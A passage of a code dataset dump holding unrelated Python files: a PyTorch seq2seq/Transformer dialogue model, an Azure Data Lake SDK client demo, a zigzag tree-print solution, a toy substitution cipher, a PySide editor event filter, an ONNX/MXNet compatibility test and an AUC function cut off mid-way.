input_history_lengths,batch_first=False)\r\n        his_outputs, hidden_his= 
self.gru_History(input_history_seq_packed, None)\r\n his_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(his_outputs,batch_first=False)\r\n his_outputs=his_outputs.index_select(1,unsort_idx_history)\r\n hidden_his=hidden_his.index_select(1,unsort_idx_history)\r\n his_outputs = his_outputs[:, :, :self.hidden_size] + his_outputs[:, : ,self.hidden_size:] # Sum bidirectional outputs (batch, 1, hidden)\r\n # hidden_kg=(num_layers * num_directions,batch, hidden_size)\r\n # concat_hidden=torch.cat((hidden_his, hidden_kg),1).reshape(self.n_layers*2,-1, self.hidden_size*2)\r\n # hidden=self.W1(concat_hidden)\r\n # outputs=self.W2(torch.cat((his_outputs, kg_outputs), 0))\r\n return his_outputs, hidden_his,kg_outputs,hidden_kg\r\nclass Attn(nn.Module):\r\n def __init__(self, method, hidden_size):\r\n super(Attn, self).__init__()\r\n\r\n self.method = method\r\n self.hidden_size = hidden_size\r\n\r\n if self.method == 'general':\r\n self.attn = nn.Linear(self.hidden_size, hidden_size)\r\n\r\n elif self.method == 'concat':\r\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\r\n self.v = nn.Parameter(torch.FloatTensor(1, hidden_size))\r\n\r\n def forward(self, hidden, encoder_outputs):\r\n # hidden [1, 64, 512], encoder_outputs [14, 64, 512]\r\n max_len = encoder_outputs.size(0)\r\n batch_size = encoder_outputs.size(1)\r\n\r\n # Create variable to store attention energies\r\n attn_energies = torch.zeros(batch_size, max_len) # B x S\r\n attn_energies = attn_energies.to(Global_device)\r\n\r\n # For each batch of encoder outputs\r\n for b in range(batch_size):\r\n # Calculate energy for each encoder output\r\n for i in range(max_len):\r\n attn_energies[b, i] = self.score(hidden[:, b], encoder_outputs[i, b].unsqueeze(0))\r\n\r\n # Normalize energies to weights in range 0 to 1, resize to 1 x B x S\r\n return F.softmax(attn_energies, dim=1).unsqueeze(1)\r\n\r\n def score(self, hidden, encoder_output):\r\n # hidden [1, 512], encoder_output [1, 512]\r\n if self.method == 'dot':\r\n energy = hidden.squeeze(0).dot(encoder_output.squeeze(0))\r\n return energy\r\n\r\n elif self.method == 'general':\r\n energy = self.attn(encoder_output)\r\n energy = hidden.squeeze(0).dot(energy.squeeze(0))\r\n return energy\r\n\r\n elif self.method == 'concat':\r\n energy = self.attn(torch.cat((hidden, encoder_output), 1))\r\n energy = self.v.squeeze(0).dot(energy.squeeze(0))\r\n return energy\r\nclass LuongAttnDecoderRNN(nn.Module):\r\n def __init__(self, attn_model,embedding_size, hidden_size, output_size, n_layers=1, dropout=0.1):\r\n super(LuongAttnDecoderRNN, self).__init__()\r\n\r\n # Keep for reference\r\n self.attn_model = attn_model\r\n self.hidden_size = hidden_size\r\n self.output_size = output_size\r\n self.n_layers = n_layers\r\n self.dropout = dropout\r\n # self.embedding_dropout = nn.Dropout(dropout)\r\n self.gru = nn.GRU(embedding_size, hidden_size, n_layers,\\\r\n dropout=(0 if n_layers == 1 else dropout), batch_first=False)\r\n self.gru_kg = nn.GRU(embedding_size, hidden_size, n_layers,\\\r\n dropout=(0 if n_layers == 1 else dropout), batch_first=False)\r\n self.concat = nn.Linear(hidden_size * 2, hidden_size)\r\n self.out = nn.Linear(2*hidden_size, output_size)\r\n\r\n # Choose attention model\r\n if attn_model != 'none':\r\n self.attn = Attn(attn_model, hidden_size)\r\n\r\n def forward(self, input_seq_embedded, last_hidden_his,last_hidden_kg, encoder_outputs):\r\n # Note: we run this one step at a time\r\n # embedded = self.embedding_dropout(embedded) \r\n\r\n # Get current hidden state from input 
word and last hidden state\r\n        # batch_first=True does not change the hidden-state init layout, which stays (num_layers * num_directions, batch, hidden_size)\r\n        rnn_output, hidden = self.gru(input_seq_embedded, last_hidden_his)\r\n        rnn_output_kg, hidden_kg = self.gru_kg(input_seq_embedded, last_hidden_kg)\r\n        rnn_output_kg = rnn_output_kg.squeeze(0)\r\n        \r\n        # Calculate attention from current RNN state and all encoder outputs;\r\n        # apply to encoder outputs to get weighted average\r\n        attn_weights = self.attn(rnn_output, encoder_outputs)  #[batchsize, 1, 14]\r\n        # encoder_outputs [seq, batchsize, hiddensize]\r\n        context = attn_weights.bmm(encoder_outputs.transpose(0, 1))  #[batchsize, 1, hiddensize]\r\n\r\n        # Attentional vector using the RNN hidden state and context vector\r\n        # concatenated together (Luong eq. 5)\r\n        rnn_output = rnn_output.squeeze(0)  #[batchsize, hiddensize]\r\n        context = context.squeeze(1)  #[batchsize, hiddensize]\r\n        concat_input = torch.cat((rnn_output, context), 1)  #[64, 1024]\r\n        concat_output = torch.tanh(self.concat(concat_input))  #[64, 512]\r\n\r\n        # Finally predict next token (Luong eq. 6, without softmax)\r\n        output = self.out(torch.cat((concat_output, rnn_output_kg), 1))  #[batchsize, output_size(vocabularysize)]\r\n\r\n        # Return final output, hidden state, and attention weights (for visualization)\r\n        return output, hidden, attn_weights\r\nclass GRU_Encoder_Decoder(nn.Module):\r\n    def __init__(self, config,voc):\r\n        super(GRU_Encoder_Decoder, self).__init__()\r\n        voc_size=voc.n_words\r\n        print('-Building GRU_Encoder_Decoder ...')\r\n        self.config=config\r\n        WORD_EMBEDDING_DIMs=WORD_EMBEDDING_DIM_PRETRAIN if config.pre_train_embedding==True \\\r\n            else WORD_EMBEDDING_DIM_NO_PRETRAIN\r\n        self.embedding=nn.Embedding(voc_size, WORD_EMBEDDING_DIMs,padding_idx=PAD_token)\r\n        if config.pre_train_embedding==True:self.embedding.weight.data.copy_(torch.from_numpy(\\\r\n            build_embedding(voc,config.voc_and_embedding_save_path)))\r\n        self.encoder=EncoderRNN(config.hidden_size,WORD_EMBEDDING_DIMs,config.n_layers,config.dropout)\r\n        self.decoder=LuongAttnDecoderRNN(config.attn,WORD_EMBEDDING_DIMs, config.hidden_size, voc_size, n_layers=config.n_layers, dropout=config.dropout)\r\n        encoder_para = sum([np.prod(list(p.size())) for p in self.encoder.parameters()])\r\n        decoder_para = sum([np.prod(list(p.size())) for p in self.decoder.parameters()])\r\n        print('Build encoder with params: {:4f}M'.format( encoder_para * 4 / 1000 / 1000))\r\n        print('Build decoder with params: {:4f}M'.format( decoder_para * 4 / 1000 / 1000))\r\n        #loading\r\n        checkpoint =torch.load(config.continue_training,map_location=Global_device) \\\r\n            if config.continue_training != \" \" else None\r\n        if checkpoint != None:\r\n            if checkpoint['type'] !=config.model_type:\r\n                raise Exception(\"checkpoint and train model type doesn't match!\")\r\n            print('-loading models from checkpoint .....')\r\n            self.encoder.load_state_dict(checkpoint['en'])\r\n            self.decoder.load_state_dict(checkpoint['de'])\r\n            self.embedding.load_state_dict(checkpoint['emb'])\r\n        self.checkpoint=checkpoint\r\n        self.teacher_forcing_ratio=1\r\n    def forward(self, BatchData):\r\n        batch_size=self.config.batch_size\r\n        history,knowledge,responses=BatchData[\"history\"],BatchData[\"knowledge\"],BatchData[\"response\"]\r\n        # log 2020.2.23: previously missed that padding_sort_transform reorders each batch, so idx_unsort must be returned and applied as well\r\n        history,len_history,idx_unsort1 = padding_sort_transform(history)\r\n        knowledge,len_knowledge,idx_unsort2 = padding_sort_transform(knowledge)\r\n        responses,len_response,idx_unsort3 = 
padding_sort_transform(responses)\r\n        history,idx_unsort1 =history.to(Global_device),idx_unsort1.to(Global_device) \r\n        knowledge,idx_unsort2= knowledge.to(Global_device),idx_unsort2.to(Global_device)\r\n        responses,idx_unsort3 = responses.to(Global_device),idx_unsort3.to(Global_device)\r\n        #encoder_outputs=torch.Size([ 154(seq),2 (batchsize), 512(hiddensize)])\r\n        # encoder_hidden=[ (direction*layer),batchsize,hiddensize]\r\n        unsort_idxs=(idx_unsort1,idx_unsort2)\r\n        history= self.embedding(history)\r\n        knowledge= self.embedding(knowledge)\r\n        encoder_outputs, encoder_hidden,kg_outputs,hidden_kg = self.encoder(history,len_history,knowledge,len_knowledge,unsort_idxs)\r\n\r\n        decoder_input = torch.LongTensor([SOS_token for _ in range(batch_size)]).reshape(1,batch_size)  #[batch_size,1]\r\n        decoder_input = decoder_input.to(Global_device)\r\n        # the decoder is unidirectional, so keep only the first n_layers of the (bidirectional) encoder hidden state\r\n        decoder_hidden = encoder_hidden[:self.decoder.n_layers]\r\n        hidden_kg= hidden_kg[:self.decoder.n_layers]\r\n        loss=0\r\n        MAX_RESPONSE_LENGTH=int(len_response[0].item())-1\r\n        responses=responses.index_select(1,idx_unsort3)\r\n        use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\r\n        if use_teacher_forcing == False :\r\n            for t in range(MAX_RESPONSE_LENGTH):\r\n                decoder_input= self.embedding(decoder_input)\r\n                decoder_output, decoder_hidden, decoder_attn = self.decoder(\r\n                    decoder_input, decoder_hidden,hidden_kg, encoder_outputs\r\n                )\r\n                # topi is the index of the most probable token\r\n                _, topi = decoder_output.topk(1)  # [batch_Size, 1]\r\n\r\n                decoder_input = torch.LongTensor([topi[i][0] for i in range(batch_size)]).reshape(1,batch_size)\r\n                decoder_input = decoder_input.to(Global_device) \r\n                # decoder_output=[batch_Size, voc] responses[seq,batchsize]\r\n                loss += F.cross_entropy(decoder_output, responses[t+1], ignore_index=EOS_token)\r\n        else:\r\n            for t in range(MAX_RESPONSE_LENGTH):\r\n                decoder_input= self.embedding(decoder_input)\r\n                decoder_output, decoder_hidden, decoder_attn = self.decoder(\r\n                    decoder_input, decoder_hidden, hidden_kg, encoder_outputs\r\n                )\r\n                decoder_input = responses[t+1].view(1, -1)  # Next input is current target\r\n                decoder_input = decoder_input.to(Global_device) \r\n                loss += F.cross_entropy(decoder_output, responses[t+1], ignore_index=EOS_token)\r\n        return loss,MAX_RESPONSE_LENGTH \r\n    def train(self, train_loader,dev_loader,optimizer):\r\n        print('-Initializing training process...')\r\n        start_epoch=1\r\n        start_iteration = 1\r\n        if self.checkpoint != None:\r\n            start_iteration = self.checkpoint['iteration'] +1\r\n            start_epoch= self.checkpoint['epoch'] \r\n            if start_iteration==int(len(train_loader)//self.config.batch_size)+1:start_epoch+=1\r\n        end_epoch=self.config.end_epoch\r\n        for epoch_id in range(start_epoch, end_epoch):\r\n            iterations,epoch_loss= self.trainIter_gru(epoch_id,start_iteration,train_loader,optimizer) \r\n            start_iteration+=iterations\r\n            record_train_step(self.config.logfile_path,epoch_id,epoch_loss)\r\n            self.dev(epoch_id,dev_loader)\r\n    def trainIter_gru(self, epoch,start_iteration,train_loader,optimizer):\r\n        self.encoder.train()\r\n        self.decoder.train()\r\n        self.embedding.train()\r\n        stage_total_loss=0\r\n        epoch_loss_avg=0\r\n        batch_size=self.config.batch_size\r\n        self.teacher_forcing_ratio=1/(epoch**(-2))\r\n        for batch_idx, data in enumerate(train_loader):\r\n            batch_idx+=1\r\n            # clear the gradients\r\n            optimizer.zero_grad()\r\n            loss,nwords=self.forward(data)\r\n            loss.backward()\r\n            clip = 100.0\r\n            _ = torch.nn.utils.clip_grad_norm_(self.parameters(), clip)\r\n            optimizer.step() \r\n            
stage_total_loss+=(loss.cpu().item()/nwords)\r\n            epoch_loss_avg+=(loss.cpu().item() /nwords)\r\n            # (optimizer.step() above is what actually applies the weight update)\r\n            if batch_idx % self.config.log_steps == 0:\r\n                print_loss_avg = (stage_total_loss / self.config.log_steps)\r\n                message=epoch,batch_idx , len(train_loader),print_loss_avg\r\n                record_train_step(self.config.logfile_path,message)\r\n                stage_total_loss=0\r\n            if start_iteration % self.config.save_iteration == 0:\r\n                save_handler=(epoch,start_iteration, self.embedding,self.encoder,self.decoder,optimizer,self.config)\r\n                save_checkpoint(save_handler)\r\n            start_iteration+=1\r\n        return len(train_loader),epoch_loss_avg/len(train_loader)\r\n    def dev(self, epoch,dev_loader):\r\n        self.encoder.eval()\r\n        self.decoder.eval()\r\n        self.embedding.eval()\r\n        batch_size=self.config.batch_size\r\n        epoch_loss_avg=0\r\n        with torch.no_grad():\r\n            for batch_idx, data in enumerate(dev_loader):\r\n                loss,nwords=self.forward(data)\r\n                epoch_loss_avg+=(loss.cpu().item() /nwords)\r\n        epoch_loss_avg/=len(dev_loader)\r\n        print('Evaluate Epoch: {}\\t avg Loss: {:.6f}\\ttime: {}'.format(\r\n            epoch,epoch_loss_avg, time.asctime(time.localtime(time.time())) ))\r\n        with open(self.config.logfile_path,'a') as f:\r\n            template=' Evaluate Epoch: {}\\t avg Loss: {:.6f}\\ttime: {}\\n'\r\n            str=template.format(epoch,epoch_loss_avg,\\\r\n                time.asctime(time.localtime(time.time())))\r\n            f.write(str)\r\n#====================Transformer========================================\r\nclass TransformerEncoder(nn.Module):\r\n    ''' Transformer encoder stack '''\r\n    def __init__(self,config,voc_Size,embedding_layer):\r\n        super().__init__()\r\n        self.char_embedding=embedding_layer\r\n        self.Positional_Encoding=PositionalEncoding(d_hid=config.embedding_size, n_position=MAX_LENGTH)\r\n        self.layerstack=nn.ModuleList([ Encoder_layer(config.embedding_size,config.n_head,config.d_k,config.d_v,config.d_hidden,config.dropout) for _ in range(config.n_layers) ])\r\n\r\n    def forward(self, x):\r\n        # x: (B, L)\r\n        slf_attn_mask=padding_mask(x)\r\n        output=self.Positional_Encoding(self.char_embedding(x))\r\n        for layer in self.layerstack:\r\n            output = layer(output,slf_attn_mask=slf_attn_mask)\r\n        return output\r\nclass TransformerDecoder(nn.Module):\r\n    ''' Transformer decoder stack '''\r\n    def __init__(self,config,voc_Size,embedding_layer):\r\n        super().__init__()\r\n        self.Positional_Encoding=PositionalEncoding(d_hid=config.embedding_size, n_position=MAX_LENGTH)\r\n        self.layerstack=nn.ModuleList([ Decoder_layer(config.embedding_size,config.n_head,config.d_k,config.d_v,config.d_hidden,config.dropout) for _ in range(config.n_layers) ])\r\n        self.char_embedding=embedding_layer\r\n    def forward(self, dec_input,enc_output,enc_input):\r\n        # dec_input: (B, L)\r\n        slf_attn_mask=padding_mask(dec_input).to(Global_device)\r\n        sq_mask=sequence_mask(dec_input).to(Global_device)\r\n        slf_attn_mask = (torch.gt((slf_attn_mask.float() + sq_mask.float()), 0)).float().to(Global_device)\r\n        enc_dec_mask=get_attn_pad_mask(dec_input,enc_input).to(Global_device)\r\n\r\n        output=self.Positional_Encoding(self.char_embedding(dec_input))\r\n        \r\n\r\n        for layer in self.layerstack:\r\n            output = layer(output,self_attn_mask=slf_attn_mask,enc_out=enc_output,enc_dec_mask=enc_dec_mask)\r\n        return output\r\nclass Transformer(nn.Module):\r\n    def __init__(self, config,voc_Size):\r\n        super().__init__() \r\n        self.config=config\r\n        self.char_embedding= Embeddings(voc_Size,config.embedding_size)\r\n        self.encoder=TransformerEncoder(config,voc_Size,self.char_embedding)\r\n        
self.decoder=TransformerDecoder(config,voc_Size,self.char_embedding)\r\n self.tgt_proj=nn.Linear(config.embedding_size, voc_Size, bias=False)\r\n self.final_softmax = nn.Softmax(dim=2)\r\n def call(self,Q,A):\r\n enc_output=self.encoder(Q)\r\n dec_input=A[:,:-1]\r\n dec_target=A[:,1:]\r\n dec_input= dec_input.to(Global_device)\r\n dec_target= dec_target.to(Global_device)\r\n dec_out=self.decoder(dec_input,enc_output,Q)\r\n dec_logits = self.final_softmax(self.tgt_proj(dec_out)) \r\n preds=dec_logits.contiguous().view(dec_logits.size(0)*dec_logits.size(1),-1)\r\n tars=dec_target.contiguous().view(-1)\r\n loss= F.cross_entropy(preds,tars)\r\n return loss\r\n def train(self,train_loader,optimizer):\r\n start_epoch=0\r\n stage_total_loss=0\r\n for epoch in range(start_epoch,self.config.end_epoch):\r\n for batch_idx,batch in enumerate(train_loader):\r\n batch_idx+=1\r\n optimizer.zero_grad()\r\n batchQ,batchA=batch[\"history\"],batch[\"response\"]\r\n batchQ = pad_sequence(batchQ,batch_first=True, padding_value=0).to(Global_device)\r\n batchA = pad_sequence(batchA,batch_first=True, padding_value=0).to(Global_device)\r\n loss=self.call(batchQ,batchA)\r\n loss.backward()\r\n optimizer.step_and_update_lr()\r\n stage_total_loss+=loss.cpu().item() \r\n if batch_idx % self.config.log_steps == 0:\r\n print_loss_avg = (stage_total_loss / self.config.log_steps)\r\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\ttime: {}'.format(\r\n epoch, batch_idx , len(train_loader),\r\n 100. * batch_idx / len(train_loader), print_loss_avg, time.asctime(time.localtime(time.time())) ))\r\n with open(self.config.logfile_path,'a') as f:\r\n template=' Train Epoch: {} [{}/{}]\\tLoss: {:.6f}\\ttime: {}\\n'\r\n str=template.format(epoch,batch_idx , len(train_loader),print_loss_avg,\\\r\n time.asctime(time.localtime(time.time())))\r\n f.write(str)\r\n stage_total_loss=0\r\n","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":25327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628899908","text":"# Make sure you've have the latest pip\n# python -m pip install --upgrade pip\n\n# To install the modules if you need them\n# pip install \n\n# To update the modules\n# pip install -U\n\n# pip modules needed\n# azure \n# msrestazure \n# azure-mgmt-resource \n# azure-mgmt-datalake-store \n# azure-mgmt-datalake-analytics\n# azure-datalake-store \n\n\n# import general Azure modules\nimport azure.mgmt.resource\nimport azure.mgmt.resource.resources\nimport msrestazure.azure_active_directory\nimport adal\n\n# import Azure Data Lake modules\nimport azure.mgmt.datalake.store\nimport azure.datalake.store\nimport azure.mgmt.datalake.analytics \n\n# All standard Python modules\nimport os\nimport sys\nimport itertools\n\ndef get_user_token_interactive(the_tenant, clientid, token_filename) :\n\n flag_ignore_cache = False # Unless you are debugging something with tokens, Recommend leave this as False\n flag_open_devicelogin_webpage = True \n \n import pickle\n import webbrowser\n import time\n RESOURCE = 'https://management.core.windows.net/'\n authority_host_url = \"https://login.microsoftonline.com\"\n authority_url = authority_host_url + '/' + the_tenant\n context = adal.AuthenticationContext(authority_url)\n devicelogin_url = \"https://aka.ms/devicelogin\"\n\n read_from_cache = os.path.isfile(token_filename) and (not(flag_ignore_cache))\n if (read_from_cache) :\n token = pickle.load( open( token_filename, \"rb\" ) )\n refresh_token = 
token['refreshToken']\n token = context.acquire_token_with_refresh_token( refresh_token,clientid,RESOURCE)\n else:\n code = context.acquire_user_code(RESOURCE, clientid)\n message = code['message'] \n print(message)\n\n if (flag_open_devicelogin_webpage) :\n if ( (message != None) and (type(message) is str)) :\n if (devicelogin_url in message) :\n webbrowser.open(devicelogin_url, new=0)\n\n token = context.acquire_token_with_device_code(RESOURCE, code, clientid)\n\n pickle.dump( token, open( token_filename, \"wb\" ) )\n\n # Needed for ADLS dataplane operations\n token.update({'access': token['accessToken'], \n 'resource': RESOURCE,\n 'refresh': token.get('refreshToken', False),\n 'time': time.time(), 'tenant': the_tenant, 'client': clientid})\n\n return token\n\n\n# define constants\nclientid = '04b07795-8ddb-461a-bbee-02f9e1bf7b46'\ntenant = \"microsoft.onmicrosoft.com\"\nsubscription_id = '045c28ea-c686-462f-9081-33c34e871ba3'\nadls_account_name = 'datainsightsadhoc'\nadla_account_name = 'datainsightsadhoc'\n\n# Get token\ntoken = get_user_token_interactive(tenant, clientid, r\"c:\\temp\\adl_demo_tokencache.pickle\")\n\ncredentials = msrestazure.azure_active_directory.AADTokenCredentials(token, clientid)\n\nprint ('Constructing clients')\n\nadlaAcctClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsAccountManagementClient(credentials, subscription_id)\nadlsAcctClient = azure.mgmt.datalake.store.DataLakeStoreAccountManagementClient(credentials, subscription_id)\nresourceClient = azure.mgmt.resource.resources.ResourceManagementClient(credentials, subscription_id)\nadlaJobClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsJobManagementClient(credentials, 'azuredatalakeanalytics.net')\nadlaCatalogClient = azure.mgmt.datalake.analytics.DataLakeAnalyticsCatalogManagementClient(credentials, 'azuredatalakeanalytics.net')\nadlsFileSystemClient = azure.datalake.store.core.AzureDLFileSystem(token, store_name = adls_account_name)\n\nprint ('Done constructing clients')\n\n## List the existing Data Lake Analytics accounts\naccounts = adlaAcctClient.account.list()\naccounts = list(accounts) # Collect all the items into one list\nfor a in accounts:\n print(\"ADLA: \" + a.name)\n\n\n## List the existing Data Lake Store accounts\naccounts = adlsAcctClient.account.list()\naccounts = list(accounts) # Collect all the items into one list\nfor a in accounts:\n print(\"ADLS: \" + a.name)\n\n## List 10 jobs in an account\njobs = adlaJobClient.job.list( adla_account_name )\njobs = itertools.islice(jobs,10) # comment this out if you want all the jobs\nfor j in jobs:\n print(\"---------------------------------\")\n print(j.name)\n print(j.submit_time)\n print(j.submitter)\n \n\n## List files in an account\nfiles = adlsFileSystemClient.ls()\nfor f in files:\n print(f)\n","sub_path":"Samples/Python_SDK/adlclient_demo.py","file_name":"adlclient_demo.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"62388334","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n def Print(self, pRoot):\n # write code here\n result = []\n l = []\n l2 = []\n s = []\n x = 1\n if pRoot is None:\n return []\n l.append(pRoot)\n while len(l) > 0:\n current_node = l.pop(0)\n s.append(current_node.val)\n if current_node.left is not None:\n l2.append(current_node.left)\n if current_node.right is not None:\n l2.append(current_node.right)\n if 
len(l) == 0:\n if len(l2) > 0:\n l.extend(l2)\n if x & 0b1 == 0:\n result.append(s[::-1])\n else:\n result.append(s)\n l2 = []\n s = []\n x += 1\n return result","sub_path":"剑指offer/59_之字形打印二叉树.py","file_name":"59_之字形打印二叉树.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"601645028","text":"import random\nimport string\nalphabets = list(string.ascii_letters)\nencrypted_alphabets = random.sample(alphabets, len(alphabets))\nprint(alphabets)\nprint(encrypted_alphabets)\n\ndef encrypt(text):\n result = \"\"\n for i in text:\n result += encrypted_alphabets[alphabets.index(i)]\n return result\n\ndef decrypt(text):\n result = \"\"\n for i in text:\n result += alphabets[encrypted_alphabets.index(i)]\n return result\n\nencrypted_text = encrypt(\"HelloWorld\")\nprint(\"Encrypted text: \", encrypted_text)\nprint(\"Decrypted text: \",decrypt(encrypted_text))","sub_path":"monoalphabetic_cipher.py","file_name":"monoalphabetic_cipher.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"66131798","text":"try:\n from PySide2.QtCore import QEvent\n from PySide2.QtCore import QObject\n from PySide2.QtCore import Qt\n\n from PySide2.QtWidgets import QWidget, QTextEdit\nexcept ImportError:\n\n from PySide.QtCore import QEvent\n from PySide.QtCore import QObject\n from PySide.QtCore import Qt\n\n from PySide.QtGui import QWidget, QTextEdit\n\ndef _process_tab(source):\n \"\"\"\n Called when the tab is pressed\n\n :param QTextEdit source:\n :return:\n \"\"\"\n cursor = source.textCursor()\n\n if not cursor.hasSelection():\n # --- No selected text - insert single Tab (as 4 spaces)\n source.insertPlainText(\" \")\n elif cursor.selection().toPlainText().find(\"\\n\") < 0:\n # --- There is only one line selected - insert 4 spaces\n source.insertPlainText(\" \")\n else:\n # --- Indent all selected lines 4 spaces right\n start = cursor.selectionStart()\n selection_start = cursor.selectionStart()\n end = cursor.selectionEnd()\n\n current_text = source.toPlainText()\n\n # --- Find the beginning of the first selected line\n if start > 0:\n while not start == 0:\n start -= 1\n if current_text[start] == \"\\n\":\n break\n\n before = current_text[:start]\n content = current_text[start:end]\n after = current_text[end:]\n\n lines_count = content.count(\"\\n\")\n\n content = content.replace(\"\\n\", \"\\n \")\n\n source.setPlainText(before + content + after)\n\n cursor.setPosition(selection_start + 4)\n cursor.setPosition(end + (lines_count * 4), cursor.KeepAnchor)\n source.setTextCursor(cursor)\n\n\nclass EditorFilter(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n\n def eventFilter(self, source, event):\n if event.type() == QEvent.KeyPress:\n if event.key() == Qt.Key_Tab:\n _process_tab(source)\n event.setAccepted(True)\n return True\n\n # noinspection PyCallByClass\n return QWidget.eventFilter(self, source, event)\n","sub_path":"peon_gui/code_runner_events.py","file_name":"code_runner_events.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53688012","text":"# Lesson 37: Performing regressions\n\nimport numpy as np\nimport pandas as pd\n\n# We'll use scipy.optimize.curve_fit to do the nonlinear regression\nimport scipy.optimize\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nrc = 
{'lines.linewidth': 4, 'axes.labelsize': 25,\n      'axes.titlesize': 30, 'lines.markersize': 20,\n      'legend.fontsize': 16, 'xtick.labelsize': 16,\n      'ytick.labelsize': 16}\nsns.set(rc=rc)\n\n# Import data\ndf = pd.read_csv('data/bcd_gradient.csv', comment='#')\n\n# Rename columns (with dictionary)\ndf = df.rename(columns={'fractional distance from anterior': 'x',\n                        '[bcd] (a.u.)': 'I_bcd'})\n\n# Plot\n_ = plt.plot(df['x'], df['I_bcd'], '.')\n\nplt.show()\n\n# Specify function for curve first\n\ndef gradient_model(x, I_0, a, lam):\n    \"\"\"Model for bicoid gradient: exponential decay + background\"\"\"\n\n    if np.any(np.array(x) < 0):\n        raise RuntimeError('x must be positive.')\n    if np.any(np.array([I_0, a, lam]) < 0):\n        raise RuntimeError('all params must be positive')\n\n    return a + I_0 * np.exp(-x / lam)\n\n# Specify initial guess\n# over one decay length the signal falls to ~1/3 (1/e) of its value\nI_0_guess = 0.6\na_guess = 0.2\nlam_guess = 0.25\n\np0 = np.array([I_0_guess, a_guess, lam_guess])\n\n# Fit the curve\npopt, _ = scipy.optimize.curve_fit(gradient_model, df['x'], df['I_bcd'], p0=p0)\n\n# Plot the fit\nI_0_opt, a_0_opt, lam_opt = popt  # unpack the fitted parameters (not the initial guesses)\nx_opt = np.linspace(0, 1, 400)\n\n# Asterisk splits up the tuple!\n_ = plt.plot(x_opt, gradient_model(x_opt, *tuple(popt)), '-k')\n","sub_path":"l37.py","file_name":"l37.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"371798042","text":"import collections\nimport os\nimport warnings\n\nimport chainer\nimport numpy as np\nimport onnx\n\nimport onnx_chainer\n\ntry:\n    import mxnet\n    MXNET_AVAILABLE = True\nexcept ImportError:\n    warnings.warn(\n        'MXNet is not installed. Please install mxnet to use '\n        'testing utility for compatibility checking.',\n        ImportWarning)\n    MXNET_AVAILABLE = False\n\n\ndef check_compatibility(model, x, fn, out_keys=None, opset_version=None):\n    if opset_version is None:\n        opset_version = onnx.defs.onnx_opset_version()\n    if not MXNET_AVAILABLE:\n        raise ImportError('check_compatibility requires MXNet.')\n\n    chainer.config.train = False\n\n    # Forward computation\n    if isinstance(x, (list, tuple)):\n        for i in x:\n            assert isinstance(i, (np.ndarray, chainer.Variable))\n        chainer_out = model(*x)\n    elif isinstance(x, np.ndarray):\n        chainer_out = model(chainer.Variable(x))\n    elif isinstance(x, chainer.Variable):\n        chainer_out = model(x)\n    else:\n        raise ValueError(\n            'The \\'x\\' argument should be a list or tuple of numpy.ndarray or '\n            'chainer.Variable, or simply numpy.ndarray or chainer.Variable '\n            'itself. 
But a {} object was given.'.format(type(x)))\n\n if isinstance(chainer_out, (list, tuple)):\n chainer_out = [y.array for y in chainer_out]\n elif isinstance(chainer_out, dict):\n chainer_outs = [chainer_out[k] for k in out_keys]\n chainer_out = tuple(out.array if isinstance(out, chainer.Variable) else\n out for out in chainer_outs)\n elif isinstance(chainer_out, chainer.Variable):\n chainer_out = (chainer_out.array,)\n else:\n raise ValueError('Unknown output type: {}'.format(type(chainer_out)))\n\n onnx_chainer.export(model, x, fn, opset_version=opset_version)\n\n sym, arg, aux = mxnet.contrib.onnx.import_model(fn)\n\n data_names = [graph_input for graph_input in sym.list_inputs()\n if graph_input not in arg and graph_input not in aux]\n if len(data_names) > 1:\n data_shapes = [(n, x_.shape) for n, x_ in zip(data_names, x)]\n else:\n data_shapes = [(data_names[0], x.shape)]\n\n mod = mxnet.mod.Module(\n symbol=sym, data_names=data_names, context=mxnet.cpu(),\n label_names=None)\n mod.bind(\n for_training=False, data_shapes=data_shapes,\n label_shapes=None)\n mod.set_params(\n arg_params=arg, aux_params=aux, allow_missing=True,\n allow_extra=True)\n\n Batch = collections.namedtuple('Batch', ['data'])\n if isinstance(x, (list, tuple)):\n x = [mxnet.nd.array(x_.array) if isinstance(\n x_, chainer.Variable) else mxnet.nd.array(x_) for x_ in x]\n elif isinstance(x, chainer.Variable):\n x = [mxnet.nd.array(x.array)]\n elif isinstance(x, np.ndarray):\n x = [mxnet.nd.array(x)]\n\n mod.forward(Batch(x))\n mxnet_outs = mod.get_outputs()\n mxnet_out = [y.asnumpy() for y in mxnet_outs]\n\n for cy, my in zip(chainer_out, mxnet_out):\n np.testing.assert_almost_equal(cy, my, decimal=5)\n\n os.remove(fn)\n","sub_path":"onnx_chainer/testing/test_mxnet.py","file_name":"test_mxnet.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541849521","text":"def calc_auc(pred, label):\n res = {}\n if type(label) is not list:\n pred = pred.reshape((-1))\n label = label.reshape((-1))\n assert len(label) == len(pred)\n positions = []\n for i in range(len(label)):\n positions.append((pred[i], label[i]))\n positions.sort()\n sum_pos, num_pos, num_neg = 0., 0., 0.\n for i in range(len(label)):\n if positions[i][1] > 0:\n sum_pos += i+1\n num_pos += 1\n num_neg = len(label) - num_pos\n res['pos'] = num_pos\n 